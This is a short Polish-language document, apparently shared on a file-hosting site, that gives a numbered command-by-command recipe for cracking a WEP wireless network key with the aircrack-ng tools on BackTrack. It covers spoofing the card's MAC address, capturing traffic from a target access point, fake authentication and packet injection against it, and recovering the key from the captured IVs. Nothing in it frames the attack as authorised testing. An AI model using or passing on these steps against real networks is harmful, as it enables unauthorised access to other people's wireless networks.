Łamanie WEP - Backtrack (4).doc

(25 KB) Pobierz

·         Sprawdzamy dostepne interfejsy: airmon-ng

·         Zatrzymujemy aktualny tryb karty: airmon-ng stop wlan0

·         Zatrzymujemy interfejs:  ifconfig wlan0 down

·         Zmieniamy mac adres: macchanger  - -mac 00:11:22:33:44:55 wlan0

·         Uruchamiamy interfejs w trybie monitoringu: airmon-ng start wlan0

·         Sprawdzamy dostępne AP i ich parametry: airodump-ng wlan0

·         Crtl + c

·         Uruchamiamy na wybranym kanale: airodump-ng –c [nr_kanalu] –w [nazwa pliku] - -bssid [bssid_ap] wlan0

·         Nowe okno konsoli

·         Uwierzytelniamy się AP: aireplay-ng -1 0 –a [bssid] –h 00:11:22:33:44:55 (opcjonalnie –e [essid]) wlan0

·         Uruchamiamy wstrzykiwanie pakietów: aireplay-ng -3 –b [bssid] –h 00:11:22:33:44:55 wlan0

·         Przy przy 15-20 tys IVS możemy przystepować do ataku. Otwieramy nowe okno konsoli

·         Łamiemy hasło: aircrack-ng –n 64 –b [bssid] [nazwa pliku].cap   (to nazwa pliku w którym są zebrane ivs)

·         GOTOWE

Zgłoś jeśli naruszono regulamin